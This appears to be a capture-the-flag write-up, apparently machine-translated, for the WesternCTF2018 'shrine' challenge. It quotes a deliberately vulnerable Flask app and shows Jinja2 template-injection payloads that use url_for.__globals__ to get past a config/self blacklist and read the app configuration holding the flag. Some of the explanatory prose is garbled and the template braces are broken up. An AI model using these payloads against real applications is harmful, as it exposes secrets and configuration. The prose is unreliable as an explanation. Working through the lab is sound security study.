[WesternCTF2018]shrine

[WesternCTF2018]shrine
flask frame

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG') 


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{
    {% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

os.environ.pop(‘FLAG’) Get environment variables Stored in a file named FLAG Of config in
Then the purpose is to obtain config The value in
flask The framework first considers template injection ssti

test ：


There are two blacklists for executing functions ：config and self
however python There are also some built-in functions , such as url_for and get_flashed_messages
Use url_for test ：

shrine/{
    {
    url_for.__globals__}}

It can be executed , see current_app Configuration information ：

shrine/{
    {
    url_for.__globals__['current_app'].config}}